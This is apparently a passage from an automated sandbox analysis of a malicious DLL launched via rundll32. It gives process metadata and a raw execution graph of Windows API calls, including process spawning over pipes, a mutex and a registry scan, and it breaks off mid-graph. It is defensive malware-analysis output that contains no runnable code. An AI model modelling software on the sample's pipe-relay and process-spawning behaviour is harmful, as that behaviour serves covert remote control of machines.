                Start time:10:59:22
                Start date:24/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7fcd70000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:11
                Start time:10:59:24
                Start date:24/11/2022
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZuk
                Imagebase:0x7ff7454a0000
                File size:69632 bytes
                MD5 hash:73C519F050C20580F8A62C849D49215A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Reset < >

                  Execution Graph

                  Execution Coverage:5.8%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:25.1%
                  Total number of Nodes:1028
                  Total number of Limit Nodes:15
                  execution_graph 5383 180001844 5384 18000187a 5383->5384 5385 180001a6a 5383->5385 5384->5385 5386 180007b04 3 API calls 5384->5386 5387 18000188d 5386->5387 5387->5385 5388 180001899 GetTempPathW 5387->5388 5389 180001a55 5388->5389 5390 1800018b9 HeapAlloc 5388->5390 5391 180001a5a HeapFree 5389->5391 5390->5389 5392 1800018d5 GetTempPathW 5390->5392 5391->5385 5393 1800018e5 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 5392->5393 5394 180001916 HeapFree 5392->5394 5393->5394 5397 180001927 5393->5397 5394->5397 5395 180001938 StrChrW 5396 180001964 lstrlenW 5395->5396 5395->5397 5396->5397 5397->5389 5397->5395 5398 1800019ef 5397->5398 5400 180001a3c DeleteFileW HeapFree 5397->5400 5405 180009b7c lstrlenA lstrlenW lstrlenW HeapAlloc 5397->5405 5398->5400 5410 180003698 5398->5410 5400->5391 5406 180009bed wnsprintfW 5405->5406 5408 180009c2e 5405->5408 5425 180006754 memset 5406->5425 5408->5397 5436 180001000 CreateFileW 5410->5436 5413 1800036d7 HeapAlloc 5415 180003709 RtlOemStringToUnicodeString 5413->5415 5416 18000375a HeapFree 5413->5416 5414 180001a09 5414->5400 5421 180005bdc 5414->5421 5417 180003731 5415->5417 5418 180003727 RtlNtStatusToDosError 5415->5418 5416->5414 5446 180005a0c WideCharToMultiByte 5417->5446 5419 180003748 HeapFree 5418->5419 5419->5416 5422 180001a27 HeapFree 5421->5422 5423 180005c0b HeapAlloc 5421->5423 5422->5400 5423->5422 5424 180005c23 memcpy EnterCriticalSection LeaveCriticalSection 5423->5424 5424->5422 5426 1800089e4 3 API calls 5425->5426 5427 1800067b1 CreateProcessW 5426->5427 5428 180006801 WaitForMultipleObjects 5427->5428 5429 180006862 GetLastError 5427->5429 5430 18000684a CloseHandle CloseHandle 5428->5430 5431 180006830 5428->5431 5432 18000686a 5429->5432 5430->5432 5431->5430 5433 18000683f TerminateProcess 5431->5433 5434 18000687d HeapFree 5432->5434 5435 18000686f HeapFree 5432->5435 5433->5430 5434->5408 5435->5434 5437 1800010c8 GetLastError 5436->5437 5438 180001059 GetFileSize 5436->5438 5444 18000106a 5437->5444 5439 180001071 HeapAlloc 5438->5439 5438->5444 5439->5437 5442 180001088 ReadFile 5439->5442 5440 1800010d6 CloseHandle 5441 1800010df 5440->5441 5443 1800010f6 5441->5443 5445 1800010e8 HeapFree 5441->5445 5442->5437 5442->5444 5443->5413 5443->5414 5444->5440 5444->5441 5445->5443 5447 180005ad3 GetLastError 5446->5447 5448 180005a6a HeapAlloc 5446->5448 5449 180005aaa 5447->5449 5448->5449 5450 180005a80 WideCharToMultiByte 5448->5450 5449->5419 5450->5449 5451 180005ab4 GetLastError HeapFree 5450->5451 5451->5449 5552 180002f24 HeapAlloc 5553 180002f6e memset CreatePipe 5552->5553 5562 180002f66 5552->5562 5554 180002fcb CreatePipe 5553->5554 5555 180002fbe GetLastError 5553->5555 5554->5555 5556 180002fe5 5554->5556 5555->5562 5566 180001d98 memset 5556->5566 5559 18000459c SetLastError 5560 180003014 5559->5560 5561 18000303e GetLastError 5560->5561 5564 18000304a 5560->5564 5561->5562 5561->5564 5563 18000459c SetLastError 5563->5564 5564->5562 5564->5563 5565 180003089 GetLastError 5564->5565 5565->5562 5567 1800089e4 3 API calls 5566->5567 5568 180001e43 5567->5568 5569 180001ec6 5568->5569 5570 180001e4b memcpy CreateProcessW 5568->5570 5569->5559 5569->5562 5571 180001eb6 HeapFree 5570->5571 5572 180001eae GetLastError 5570->5572 5571->5569 5572->5571 5573 180009344 5574 18000938a 5573->5574 5581 1800094a7 5573->5581 5575 18000459c SetLastError 5574->5575 5576 180009398 5575->5576 5577 18000459c SetLastError 5576->5577 5576->5581 5578 1800093fb 5577->5578 5578->5581 5585 1800070fc memcpy 5578->5585 5580 18000459c SetLastError 5580->5581 5584 180009479 5584->5580 5584->5581 5586 180007189 5585->5586 5587 180007159 5585->5587 5603 18000417c 5586->5603 5587->5586 5589 18000716c memcpy 5587->5589 5589->5587 5590 1800071ee 5590->5581 5590->5584 5593 180007358 5590->5593 5591 18000719b 5591->5590 5609 180004748 5591->5609 5594 18000738b 5593->5594 5622 1800062d8 5594->5622 5597 1800073e3 5599 1800073d3 5597->5599 5600 180007b04 3 API calls 5597->5600 5598 1800073b4 GetModuleHandleA 5598->5599 5599->5584 5601 1800073f2 5600->5601 5601->5599 5602 180007404 HeapFree 5601->5602 5602->5599 5604 180004217 5603->5604 5607 1800041ac 5603->5607 5604->5591 5605 180004206 GetLastError 5605->5607 5606 18000459c SetLastError 5606->5607 5607->5604 5607->5605 5607->5606 5618 180003cc0 5607->5618 5610 18000459c SetLastError 5609->5610 5611 1800047a3 5610->5611 5612 1800047c7 5611->5612 5613 18000490c GetLastError 5611->5613 5614 18000490a 5612->5614 5615 18000459c SetLastError 5612->5615 5616 1800048d4 GetLastError 5612->5616 5617 180004875 GetLastError 5612->5617 5613->5614 5614->5590 5615->5612 5616->5612 5617->5612 5619 180003de7 5618->5619 5621 180003d04 5618->5621 5619->5607 5620 18000459c SetLastError 5620->5621 5621->5619 5621->5620 5623 180006324 5622->5623 5624 180006309 5622->5624 5623->5597 5623->5598 5623->5599 5624->5623 5626 180001624 5624->5626 5627 18000165e 5626->5627 5628 180001696 lstrlenA 5627->5628 5629 180001667 5627->5629 5628->5629 5629->5623 5676 180001b84 5677 180001bb8 5676->5677 5678 180001bce HeapFree 5677->5678 5679 180005600 7 API calls 5677->5679 5679->5678 5680 231226401d3 5682 231226401de 5680->5682 5683 231226401c6 5680->5683 5682->5680 5682->5683 5684 23122640219 5682->5684 5686 23122643edc 5682->5686 5684->5683 5690 23122641c0b 5684->5690 5688 23122643f1a 5686->5688 5687 23122644020 5687->5682 5688->5687 5689 231226440bd RtlAllocateHeap 5688->5689 5689->5687 5691 23122641c14 5690->5691 5692 23122641c29 5690->5692 5691->5684 5692->5691 5693 23122641c1e RtlAllocateHeap 5692->5693 5693->5691 5647 180008368 CreateEventA 5648 180008598 GetLastError 5647->5648 5649 1800083ae 5647->5649 5650 1800085a0 5648->5650 5651 18000459c SetLastError 5649->5651 5653 1800085aa CloseHandle 5650->5653 5654 1800085b0 5650->5654 5652 1800083c9 5651->5652 5652->5648 5655 1800083ea ResumeThread 5652->5655 5653->5654 5656 1800083f4 GetExitCodeProcess 5655->5656 5656->5648 5664 18000840b 5656->5664 5657 180008593 5657->5648 5657->5650 5658 18000841b PeekNamedPipe 5658->5648 5658->5664 5659 18000844c ReadFile 5659->5648 5659->5664 5661 1800084c6 WriteFile 5661->5648 5661->5664 5662 1800084ee WaitForMultipleObjects 5662->5650 5662->5664 5663 18000459c SetLastError 5663->5664 5664->5648 5664->5650 5664->5656 5664->5657 5664->5658 5664->5659 5664->5661 5664->5662 5664->5663 5665 18000854e WriteFile 5664->5665 5667 18000858b GetLastError 5664->5667 5668 180004258 5664->5668 5666 180008571 ResetEvent 5665->5666 5665->5667 5666->5656 5667->5657 5671 180004287 5668->5671 5669 1800042fa 5669->5664 5670 18000459c SetLastError 5670->5671 5671->5669 5671->5670 5357 1800025ec SleepEx 5358 180002609 5357->5358 5359 18000261b 5357->5359 5358->5359 5360 180002612 WaitForSingleObject 5358->5360 5360->5359 5361 23122640000 5362 23122640002 5361->5362 5364 23122640017 5362->5364 5365 231226401c1 5362->5365 5366 231226403a5 5365->5366 5368 231226437a7 5366->5368 5369 231226437a9 5368->5369 5371 231226437ae 5369->5371 5372 23122643880 5369->5372 5371->5366 5373 23122643882 5372->5373 5374 23122643a5f RtlAllocateHeap 5373->5374 5376 2312264392e 5373->5376 5375 23122643c82 5374->5375 5375->5371 5376->5371 5452 180004c4c 5453 180004c6d EnterCriticalSection LeaveCriticalSection 5452->5453 5456 180002770 5453->5456 5457 180008308 SetLastError 5456->5457 5458 180002782 5457->5458 5459 180008308 SetLastError 5458->5459 5460 18000278a 5459->5460 5461 180002791 GetCurrentThreadId 5460->5461 5462 1800027b3 5460->5462 5463 1800027a9 CloseHandle 5461->5463 5464 18000279c WaitForSingleObject 5461->5464 5463->5462 5464->5463 5672 180007d6f 5673 180007d83 5672->5673 5674 180007d87 5673->5674 5675 180007d8c HeapFree 5673->5675 5675->5674 5493 180001110 5494 18000459c SetLastError 5493->5494 5495 18000113c 5494->5495 5496 180001175 5495->5496 5497 180001166 GetLastError 5495->5497 5497->5496 4491 180001334 4492 180001343 4491->4492 4493 180001357 4491->4493 4498 18000134f 4492->4498 4499 180004f1c HeapCreate 4492->4499 4510 180005578 4493->4510 4497 18000136a HeapDestroy 4497->4498 4500 180004f5d 4499->4500 4509 180005069 4499->4509 4501 180004ffc 4500->4501 4504 180004f8e HeapAlloc 4500->4504 4502 180005005 HeapDestroy 4501->4502 4503 180005010 HeapAlloc 4501->4503 4502->4509 4505 180005039 HeapDestroy 4503->4505 4506 180005049 4503->4506 4508 180004fb3 4504->4508 4505->4509 4519 18000508c HeapAlloc 4506->4519 4508->4501 4509->4498 4511 18000559a 4510->4511 4512 18000135e 4511->4512 4513 1800055b5 4511->4513 4514 1800055af SetEvent 4511->4514 4512->4497 4512->4498 4515 1800055bc Sleep 4513->4515 4516 1800055d0 4513->4516 4514->4513 4515->4515 4515->4516 4517 1800055d9 CloseHandle 4516->4517 4518 1800055df HeapFree 4516->4518 4517->4518 4518->4512 4520 180005419 4519->4520 4521 1800050e0 memset InitializeCriticalSection 4519->4521 4520->4509 4568 180008b44 GetModuleHandleA 4521->4568 4525 180005578 4 API calls 4527 180005417 4525->4527 4527->4520 4530 18000515b HeapAlloc 4533 180005226 4530->4533 4534 18000518a RegOpenKeyW 4530->4534 4531 180005150 GetLastError 4532 180005408 4531->4532 4532->4520 4554 1800052f8 4532->4554 4536 180005234 memcpy 4533->4536 4533->4554 4535 180005216 HeapFree 4534->4535 4544 1800051b2 4534->4544 4535->4533 4587 180005ca4 4536->4587 4537 1800051cf RegEnumKeyW 4538 1800051ee RegCloseKey 4537->4538 4537->4544 4538->4535 4538->4536 4543 18000529a 4543->4554 4603 180006dcc 4543->4603 4544->4537 4544->4538 4626 180009110 4544->4626 4545 180005ca4 6 API calls 4545->4543 4548 1800052e2 4548->4554 4613 180008708 4548->4613 4549 1800052b8 4630 180003c24 HeapAlloc 4549->4630 4553 180003c24 2 API calls 4555 1800052d7 4553->4555 4554->4525 4555->4548 4556 1800052f3 4556->4554 4557 180005361 4556->4557 4557->4554 4558 180005376 GetModuleHandleA 4557->4558 4559 180005393 4558->4559 4560 1800053fb 4558->4560 4561 18000459c SetLastError 4559->4561 4634 180002b60 4560->4634 4563 1800053a1 4561->4563 4564 1800053a9 GetCurrentThreadId 4563->4564 4565 1800053b9 4563->4565 4564->4565 4565->4531 4566 18000459c SetLastError 4565->4566 4567 1800053d8 4566->4567 4567->4520 4567->4531 4674 180007b94 4568->4674 4571 180008b81 GetModuleHandleA 4573 180007b94 3 API calls 4571->4573 4572 18000510d 4572->4554 4576 180007678 4572->4576 4574 180008b9d 4573->4574 4574->4572 4681 180002464 LoadLibraryA 4574->4681 4577 18000459c SetLastError 4576->4577 4578 1800076ae GetModuleHandleA 4577->4578 4580 1800076d5 4578->4580 4582 180005120 4578->4582 4581 18000459c SetLastError 4580->4581 4581->4582 4583 18000459c 4582->4583 4586 1800045b0 4583->4586 4584 1800045d3 SetLastError 4585 1800045de 4584->4585 4585->4530 4585->4531 4586->4584 4586->4585 4588 18000459c SetLastError 4587->4588 4589 180005cde 4588->4589 4590 180005ce5 CreateFileW 4589->4590 4591 180005d0b 4589->4591 4590->4591 4592 180005d18 RtlInitUnicodeString 4591->4592 4593 180005dcd GetLastError 4591->4593 4595 18000459c SetLastError 4592->4595 4594 18000527b 4593->4594 4594->4543 4594->4545 4596 180005d3c 4595->4596 4597 180005d41 NtQueryDirectoryFile 4596->4597 4598 180005d92 4596->4598 4597->4598 4600 18000459c SetLastError 4598->4600 4602 180005d9b 4598->4602 4599 180005dc2 CloseHandle 4599->4594 4601 180005db7 4600->4601 4601->4599 4601->4602 4602->4599 4688 1800089e4 4603->4688 4606 180006e21 lstrlenW 4608 180006e38 lstrcmpiW 4606->4608 4609 180006e4f 4606->4609 4607 1800052b1 4607->4548 4607->4549 4608->4609 4610 180006e7a HeapFree 4608->4610 4699 180002594 4609->4699 4610->4607 4614 180008759 4613->4614 4615 1800087f7 4614->4615 4709 1800030c8 4614->4709 4615->4556 4618 18000459c SetLastError 4619 1800087a9 4618->4619 4620 1800087ae CreateMutexW 4619->4620 4621 1800087c0 4619->4621 4620->4621 4622 1800087c8 GetLastError 4621->4622 4623 1800087e9 HeapFree 4621->4623 4624 1800087d5 FindCloseChangeNotification 4622->4624 4625 1800087e0 4622->4625 4623->4615 4624->4623 4625->4623 4627 18000914a 4626->4627 4629 1800091cd 4626->4629 4628 18000919e memcpy 4627->4628 4627->4629 4628->4629 4629->4544 4631 180003c66 4630->4631 4632 180003c9c 4630->4632 4633 180003c76 _snprintf 4631->4633 4632->4548 4632->4553 4633->4632 4633->4633 4635 180002464 6 API calls 4634->4635 4636 180002ba5 4635->4636 4637 180002bd9 4636->4637 4638 180002464 6 API calls 4636->4638 4639 180002f0d 4637->4639 4718 180008c60 HeapAlloc 4637->4718 4640 180002bbc 4638->4640 4639->4532 4640->4637 4642 180002bc2 HeapFree 4640->4642 4642->4637 4643 180002ed2 4644 180002ee5 HeapFree 4643->4644 4645 180002ef8 4643->4645 4644->4645 4645->4639 4646 180002f01 HeapFree 4645->4646 4646->4639 4647 180002beb 4647->4643 4648 180002ec8 4647->4648 4728 1800022ac memset 4647->4728 4807 180002620 4648->4807 4653 18000459c SetLastError 4655 180002cc6 4653->4655 4654 180002c8a 4654->4653 4655->4648 4656 180002370 2 API calls 4655->4656 4657 180002d20 4656->4657 4658 180002d41 4657->4658 4741 180002668 lstrlenA HeapAlloc 4657->4741 4660 180002370 2 API calls 4658->4660 4661 180002d5f 4660->4661 4662 180002370 2 API calls 4661->4662 4664 180002dad 4662->4664 4663 180002370 2 API calls 4665 180002dfa 4663->4665 4664->4663 4667 180002e16 GetSystemTimeAsFileTime 4665->4667 4668 180002e40 4665->4668 4667->4668 4670 18000459c SetLastError 4668->4670 4671 180002e9e 4668->4671 4750 180007dbc 4668->4750 4774 18000137c 4668->4774 4670->4668 4671->4648 4783 180007950 4671->4783 4675 180007d87 4674->4675 4676 180007beb 4674->4676 4675->4571 4675->4572 4676->4675 4677 180007bf9 RtlAllocateHeap 4676->4677 4677->4675 4678 180007c2a memset 4677->4678 4680 180007c69 4678->4680 4679 180007d8c HeapFree 4679->4675 4680->4675 4680->4679 4682 180002484 4681->4682 4683 1800024af GetLastError 4681->4683 4684 180007b94 3 API calls 4682->4684 4685 180002497 4683->4685 4686 180002491 4684->4686 4685->4572 4686->4685 4687 1800024a4 FreeLibrary 4686->4687 4687->4685 4689 180008a19 4688->4689 4690 180006e17 4689->4690 4691 18000459c SetLastError 4689->4691 4690->4606 4690->4607 4692 180008a38 4691->4692 4692->4690 4693 180008a51 HeapAlloc 4692->4693 4693->4690 4694 180008a6b 4693->4694 4695 18000459c SetLastError 4694->4695 4696 180008a79 4695->4696 4697 180008a91 4696->4697 4698 180008a9d HeapFree 4696->4698 4697->4690 4698->4690 4700 1800025b8 4699->4700 4705 1800072a4 4700->4705 4706 1800072df 4705->4706 4707 1800072f7 memcpy 4706->4707 4708 180007310 4706->4708 4707->4708 4710 180003117 4709->4710 4711 18000310a lstrlenW 4709->4711 4712 18000311a HeapAlloc 4710->4712 4711->4712 4713 18000319c 4712->4713 4714 180003134 4712->4714 4713->4615 4713->4618 4715 180003154 4714->4715 4716 18000313c memcpy 4714->4716 4717 18000315c memcpy 4715->4717 4716->4715 4717->4713 4717->4715 4719 180008d09 4718->4719 4720 180008cb9 memset 4718->4720 4719->4647 4721 180002464 6 API calls 4720->4721 4722 180008cde 4721->4722 4723 180008cfe 4722->4723 4724 180008ce4 HeapAlloc 4722->4724 4725 180002620 2 API calls 4723->4725 4724->4723 4726 180008d0b 4724->4726 4725->4719 4727 180008d3a InitializeCriticalSection 4726->4727 4727->4719 4810 180001c00 lstrlenA HeapAlloc 4728->4810 4731 180001c00 4 API calls 4732 18000230f 4731->4732 4733 180001c00 4 API calls 4732->4733 4736 180002348 4732->4736 4734 18000232b 4733->4734 4734->4736 4813 180008d78 4734->4813 4736->4648 4737 180002370 4736->4737 4738 180002385 4737->4738 4739 1800023a9 4738->4739 4847 1800094e0 4738->4847 4739->4654 4742 1800026c4 4741->4742 4743 180002749 4741->4743 4744 1800026e3 4742->4744 4745 1800026d4 lstrcpyA 4742->4745 4743->4658 4746 18000459c SetLastError 4744->4746 4745->4744 4747 1800026f9 4746->4747 4748 180002721 CloseHandle 4747->4748 4749 18000272c GetLastError HeapFree 4747->4749 4748->4743 4749->4743 4852 180001cb0 4750->4852 4755 180007fff 4756 1800045e8 4 API calls 4755->4756 4772 180007f3a 4755->4772 4756->4772 4758 180007f68 GetSystemTimeAsFileTime 4762 180007f78 4758->4762 4769 180007f91 4758->4769 4760 180007fba HeapFree 4764 180007fcc 4760->4764 4761 180007fdc 4761->4668 4762->4769 4907 1800045e8 4762->4907 4763 180007ed8 4765 180007eef 4763->4765 4888 1800023b8 4763->4888 4764->4761 4913 180008bc4 4764->4913 4765->4755 4894 1800099f4 4765->4894 4769->4760 4769->4761 4772->4758 4772->4769 4773 180007fef HeapFree 4773->4755 4775 180001605 4774->4775 4776 1800013b1 4774->4776 4775->4668 4776->4775 4777 180001531 memcpy 4776->4777 4778 180001593 HeapAlloc 4776->4778 4777->4776 4778->4776 4779 1800015aa memcpy 4778->4779 4780 1800015cb 4779->4780 5264 180005748 4780->5264 4784 180007959 4783->4784 4785 180002eba HeapFree 4783->4785 4786 180007a57 DeleteCriticalSection 4784->4786 4787 18000798d SetEvent 4784->4787 4785->4648 4786->4785 5343 180008308 4787->5343 4790 1800079a3 WaitForSingleObject CloseHandle 4791 1800079ba 4790->4791 4792 1800079c3 CloseHandle 4791->4792 4793 1800079c9 EnterCriticalSection 4791->4793 4792->4793 4794 1800079df 4793->4794 4795 1800079f0 LeaveCriticalSection 4794->4795 4797 180008308 SetLastError 4794->4797 4796 180007a09 4795->4796 4798 180007a01 Sleep 4796->4798 4799 180007a0e 4796->4799 4797->4794 4798->4796 4800 180007a15 Sleep 4799->4800 4801 180007a26 4799->4801 4800->4800 4800->4801 4802 180007a35 4801->4802 4803 180007a2f CloseHandle 4801->4803 4804 180007a44 4802->4804 4805 180007a3e CloseHandle 4802->4805 4803->4802 4804->4786 4806 180007a4c HeapFree 4804->4806 4805->4804 4806->4786 4808 180002641 HeapFree 4807->4808 4809 18000264c HeapFree 4807->4809 4808->4809 4811 180001c6d 4810->4811 4812 180001c4d memcpy memset 4810->4812 4811->4731 4811->4736 4812->4811 4814 180002370 2 API calls 4813->4814 4815 180008dc8 4814->4815 4816 1800090ee 4815->4816 4817 180008df9 lstrlenA HeapAlloc 4815->4817 4835 180008f3e HeapFree 4815->4835 4816->4736 4819 180008e20 memcpy 4817->4819 4817->4835 4821 180008e3c 4819->4821 4820 180008f85 4822 180002370 2 API calls 4820->4822 4823 180008e7b 4821->4823 4824 180008e50 lstrlenA HeapAlloc 4821->4824 4825 180008fa3 4822->4825 4826 180008eda 4823->4826 4827 180008f4f HeapFree 4823->4827 4824->4823 4825->4816 4829 180002370 2 API calls 4825->4829 4844 18000958c EnterCriticalSection 4826->4844 4827->4835 4830 180008ff3 4829->4830 4833 18000905e 4830->4833 4836 18000958c 2 API calls 4830->4836 4837 180002370 2 API calls 4833->4837 4834 180008f1d HeapFree HeapFree 4834->4835 4835->4816 4835->4820 4838 180009018 memcpy 4836->4838 4841 18000907d 4837->4841 4839 180009043 LeaveCriticalSection HeapFree 4838->4839 4840 18000902f memset 4838->4840 4839->4833 4840->4839 4841->4816 4842 18000958c 2 API calls 4841->4842 4843 1800090b2 GetSystemTimeAsFileTime LeaveCriticalSection 4842->4843 4843->4816 4845 1800095a2 Sleep 4844->4845 4846 180008eeb LeaveCriticalSection 4844->4846 4845->4845 4845->4846 4846->4834 4846->4835 4848 180009550 4847->4848 4849 180009514 4847->4849 4848->4739 4849->4848 4850 18000951c HeapAlloc 4849->4850 4850->4848 4851 180009534 memcpy 4850->4851 4851->4848 4853 180001cec EnterCriticalSection 4852->4853 4854 180001d7d 4852->4854 4855 180001d0c 4853->4855 4859 180008034 EnterCriticalSection LeaveCriticalSection HeapAlloc 4854->4859 4856 180001d74 LeaveCriticalSection 4855->4856 4857 180001d14 HeapAlloc 4855->4857 4856->4854 4858 180001d2a 4857->4858 4858->4856 4860 180007e3c 4859->4860 4861 1800080aa memset EnterCriticalSection 4859->4861 4860->4755 4864 18000970c 4860->4864 4862 180008111 LeaveCriticalSection 4861->4862 4863 1800080d5 4861->4863 4862->4860 4863->4862 4865 180009751 4864->4865 4866 180009758 EnterCriticalSection LeaveCriticalSection 4864->4866 4868 1800045e8 4 API calls 4865->4868 4867 1800097d1 4866->4867 4872 18000977f 4866->4872 4869 180007ec3 HeapFree 4867->4869 4918 180006108 HeapAlloc 4867->4918 4868->4866 4869->4763 4869->4765 4875 180001c00 4 API calls 4872->4875 4873 180009833 EnterCriticalSection LeaveCriticalSection 4876 180009866 4873->4876 4877 18000985f 4873->4877 4874 18000995c HeapFree 4874->4869 4875->4867 4879 180009882 lstrlenA lstrlenA 4876->4879 4880 18000993c HeapFree HeapFree 4876->4880 4878 180001c00 4 API calls 4877->4878 4878->4876 4881 180001c00 4 API calls 4879->4881 4880->4874 4882 1800098a7 4881->4882 4883 18000992e HeapFree 4882->4883 4884 1800098af memcpy 4882->4884 4883->4880 4930 1800088b4 4884->4930 4889 180002446 4888->4889 4893 1800023e6 4888->4893 4889->4765 4890 1800023eb EnterCriticalSection 4890->4893 4891 180002421 LeaveCriticalSection 4892 18000242f HeapFree 4891->4892 4891->4893 4892->4893 4893->4889 4893->4890 4893->4891 4895 180009a3e 4894->4895 4896 180007f30 4895->4896 4897 1800094e0 2 API calls 4895->4897 4896->4772 4896->4773 4898 180009a73 4897->4898 4898->4896 4899 180009aa4 4898->4899 5213 1800081f0 4898->5213 4901 180009b36 memset HeapFree 4899->4901 5218 180006eb0 4899->5218 4901->4896 4904 180009b16 4906 180009b1b memset HeapFree 4904->4906 4905 180009ae8 memcpy HeapFree 4905->4906 4906->4901 4908 18000958c 2 API calls 4907->4908 4909 18000460b 4908->4909 4910 180004616 GetSystemTimeAsFileTime 4909->4910 4911 18000462c LeaveCriticalSection 4909->4911 4910->4911 4911->4769 4914 180008be1 EnterCriticalSection 4913->4914 4915 180008c2e 4913->4915 4916 180008c14 LeaveCriticalSection 4914->4916 4915->4761 4916->4915 4919 180006163 4918->4919 4920 18000627d 4918->4920 4921 1800061ec 4919->4921 4941 180006008 lstrlenA HeapAlloc 4919->4941 4946 180006344 Sleep GetSystemTimeAsFileTime 4919->4946 4920->4873 4920->4874 4925 180006222 4921->4925 4977 180007444 GetSystemTimeAsFileTime _snprintf 4921->4977 4922 18000626f HeapFree 4922->4920 4925->4922 4926 180006240 HeapFree 4925->4926 4928 18000625a HeapFree 4925->4928 4926->4925 4928->4925 4931 1800088e9 4930->4931 4932 1800088ec memset 4930->4932 4931->4932 5084 180005448 4932->5084 4936 180008955 4940 180008965 4936->4940 5118 180003fcc 4936->5118 5134 180003e58 4940->5134 4942 180006069 _snprintf 4941->4942 4943 1800060e5 4941->4943 4942->4943 4944 1800060c7 lstrcpyA 4942->4944 4943->4919 4944->4943 4947 1800063a7 4946->4947 4988 1800066a8 4947->4988 4949 1800063d2 4950 1800063e3 lstrlenA lstrlenA HeapAlloc 4949->4950 4951 1800061b8 HeapFree 4949->4951 4952 180006671 HeapFree 4950->4952 4953 180006417 lstrcpyA 4950->4953 4951->4919 4951->4921 4952->4951 4954 180006456 4953->4954 4955 18000642f 4953->4955 4992 1800031d4 4954->4992 4955->4954 4956 180006434 lstrcatA lstrcatA 4955->4956 4956->4954 4959 180006663 HeapFree 4959->4952 4960 18000646e lstrlenA HeapAlloc 4961 1800064ad 4960->4961 4962 180006650 HeapFree 4960->4962 4964 1800066a8 3 API calls 4961->4964 4963 18000665e 4962->4963 4963->4959 4965 1800064e2 4964->4965 4966 180006642 HeapFree 4965->4966 4967 1800064f0 _snprintf HeapFree 4965->4967 4966->4962 4967->4963 4968 180006531 4967->4968 4968->4963 5009 180001208 4968->5009 4971 180006562 HeapAlloc 4971->4966 4972 180006589 4971->4972 4973 1800066a8 3 API calls 4972->4973 4974 1800065be 4973->4974 4975 180006634 HeapFree 4974->4975 4976 1800065c8 _snprintf _snprintf HeapFree 4974->4976 4975->4966 4976->4959 4978 1800074fc HeapAlloc 4977->4978 4983 1800074c8 4977->4983 4979 180007526 _snprintf HeapAlloc 4978->4979 4980 180007659 4978->4980 4982 18000764b HeapFree 4979->4982 4985 180007561 4979->4985 4980->4925 4981 1800074d7 lstrlenA 4981->4983 4982->4980 4983->4978 4983->4981 4984 180007603 _snprintf 4984->4980 4985->4984 4986 180007590 _snprintf memcpy memcpy 4985->4986 4986->4986 4987 1800075f9 4986->4987 4987->4984 4989 1800066e8 HeapAlloc 4988->4989 4990 1800066cf Sleep GetSystemTimeAsFileTime 4988->4990 4991 1800066ff 4989->4991 4990->4989 4991->4949 5020 180006a84 4992->5020 4995 180003391 4995->4959 4995->4960 4996 18000321e lstrlenA HeapAlloc 4997 180003383 HeapFree 4996->4997 4998 180003250 memcpy lstrcpyA lstrlenA 4996->4998 4997->4995 4999 180001208 14 API calls 4998->4999 5000 180003294 HeapFree 4999->5000 5000->4997 5001 1800032ac 5000->5001 5032 18000467c 5001->5032 5004 180003365 HeapFree HeapFree 5004->4997 5005 1800032f8 HeapAlloc 5006 180003324 UrlEscapeA 5005->5006 5007 180003341 5005->5007 5006->5007 5008 180003350 HeapFree 5006->5008 5007->5004 5008->5004 5010 180001249 5009->5010 5011 1800012d4 5009->5011 5010->5011 5012 180001252 EnterCriticalSection LeaveCriticalSection 5010->5012 5011->4966 5011->4971 5059 180009994 5012->5059 5015 180001292 HeapAlloc 5015->5011 5016 1800012aa 5015->5016 5017 180009994 10 API calls 5016->5017 5018 1800012ce 5017->5018 5018->5011 5019 1800012e8 HeapFree 5018->5019 5019->5011 5041 18000702c 5020->5041 5022 180006ac3 5023 1800066a8 3 API calls 5022->5023 5024 180006b20 5023->5024 5025 180003212 5024->5025 5026 1800066a8 3 API calls 5024->5026 5025->4995 5025->4996 5027 180006b34 5026->5027 5028 180006b3c HeapAlloc 5027->5028 5029 180006b7e HeapFree 5027->5029 5030 180006b54 5028->5030 5031 180006b70 HeapFree 5028->5031 5029->5025 5030->5031 5031->5029 5054 1800039a0 5032->5054 5035 1800046c5 HeapAlloc 5036 1800032d0 5035->5036 5037 1800046e0 5035->5037 5036->5004 5036->5005 5038 1800039a0 2 API calls 5037->5038 5039 1800046f3 5038->5039 5039->5036 5040 180004716 HeapFree 5039->5040 5040->5036 5042 18000459c SetLastError 5041->5042 5043 180007053 5042->5043 5044 18000707a 5043->5044 5045 1800070ce GetLastError 5043->5045 5046 18000459c SetLastError 5044->5046 5047 1800070be 5045->5047 5048 180007088 5046->5048 5049 1800070e7 5047->5049 5050 180004cfc Sleep GetSystemTimeAsFileTime 5047->5050 5051 1800070a4 5048->5051 5052 1800070a8 GetLastError 5048->5052 5049->5022 5050->5049 5053 18000459c SetLastError 5051->5053 5052->5051 5053->5047 5055 18000459c SetLastError 5054->5055 5056 1800039d9 5055->5056 5057 180003a05 5056->5057 5058 1800039fd GetLastError 5056->5058 5057->5035 5057->5036 5058->5057 5060 1800099a2 5059->5060 5061 18000128b 5060->5061 5063 180004a14 5060->5063 5061->5011 5061->5015 5064 18000459c SetLastError 5063->5064 5065 180004a54 5064->5065 5066 180004a7f 5065->5066 5067 180004c20 GetLastError 5065->5067 5068 180006d04 SetLastError memcpy memset GetLastError 5066->5068 5075 180004c10 5067->5075 5069 180004a9e 5068->5069 5070 180004bf6 5069->5070 5071 180004aa8 memset 5069->5071 5073 18000459c SetLastError 5070->5073 5072 18000459c SetLastError 5071->5072 5074 180004aca 5072->5074 5073->5075 5076 180004ae9 GetLastError 5074->5076 5079 180004af9 5074->5079 5075->5061 5076->5070 5076->5079 5077 180004afd memcpy 5077->5079 5078 18000459c SetLastError 5078->5079 5079->5077 5079->5078 5080 180004bd6 GetLastError 5079->5080 5081 180004bb0 memcpy 5079->5081 5082 180004bde 5080->5082 5081->5079 5081->5082 5083 18000459c SetLastError 5082->5083 5083->5070 5085 180005496 5084->5085 5086 180005486 